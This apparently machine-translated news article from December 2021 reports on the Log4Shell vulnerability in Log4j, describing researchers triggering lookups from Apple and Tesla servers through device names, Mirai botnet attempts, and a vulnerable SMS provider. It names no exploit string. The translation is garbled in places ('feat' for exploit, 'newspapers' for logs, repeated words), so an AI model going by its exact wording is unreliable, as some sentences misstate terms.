Posted December 15, 2021, 11:51
Security researchers who study the recently discovered log4shell feat and "extremely bad" claim to have used it on devices as varied as tesla iPhones and cars.Depending on the screenshot shared online, it was enough to change the name of the device from an iPhone or Tesla into a special operating character string to trigger a ping of Apple or Tesla servers, indicating thatThe server at the other end was vulnerable to LOG4SHELL.
In demonstrations, the researchers changed the names of the devices into a character string that would send the servers to a test URL, thus exploiting the behavior activated by vulnerability.After the modification of the name, the incoming traffic showed URL requests from IP addresses belonging to Apple and, in the case of Tesla, to China Unicom - the company's mobile services partner for the Chinese market.In short, the researchers prompted the servers of Apple and Tesla to visit an URL of their choice.
The demonstration of the iPhone comes from a Dutch security researcher;The other was downloaded from the anonymous log4jattacksurface github deposit.
Assuming that the images are authentic, they show behavior - loading of remote resources - which should not be possible with a text contained in a device name.This proof of concept has given rise to many reports indicating that Apple and Tesla are vulnerable to this feat.
If the demonstration is alarming, its usefulness for cybercriminals is not obvious.In theory, an attacker could host a malware with the target URL in order to infect vulnerable servers, but a well -maintained network could prevent such an attack at the level of the level.More generally, nothing indicates that the method could lead to a broader compromise of Apple or Tesla systems.(None of the two companies responded to a request for comments by email at the time of publication).
En lien avec cet article :Ordinateur portable Black Friday : le prix du Chromebook HP déjà massacré sur Amazon !Nevertheless, this recalls the complex nature of technological systems, which almost always depend on code from third -party libraries.The LOG4SHELL feat affects an open-source Java tool called LOG4J which is widely used for journalization of application events.We do not yet know exactly how many devices are affected, but researchers believe that these are millions, including dark systems which are rarely targeted by attacks of this nature.
We do not know the full extent of the exploitation in nature, but in a blog post, the Cado digital criminalic platform reported that it has detected servers trying to use this method to install the Botnet Mirai code.
Log4shell is all the more serious since it is relatively easy to exploit.Vulnerability works by encouraging the application to interpret a piece of text as a link to a remote resource and try to recover this resource instead of recording the text as it is written.It is enough that a vulnerable device records the special character string in the newspapers of its application.
This creates a potential for vulnerability in many systems that accept user inputs, since the text of the message can be stored in the newspapers.The vulnerability of LOG4J was identified for the first time in the Minecraft servers, which the attackers could compromise using chat messages;Systems that send and receive other messages of messages, such as SMS, are also vulnerable.
According to the tests carried out by The Verge, at least a large SMS supplier seems to be vulnerable to the feat.When sent to numbers operated by the SMS supplier, text messages containing the operating code trigger a response from the company's servers which reveals information on the IP address and the host name, thisWho suggests that servers could be trapped to execute a malicious code.Calls and emails addressed to the company concerned remained unanswered at the time of publication.
En lien avec cet article :La Tesla Model 3 et la Model Y ont une nouvelle batterie : voici ce que cela signifieAn update of the Library Library was published in order to mitigate the vulnerability, but the application of fixes to all vulnerable machines will take time, given the difficulties linked to the update of company software to largeladder.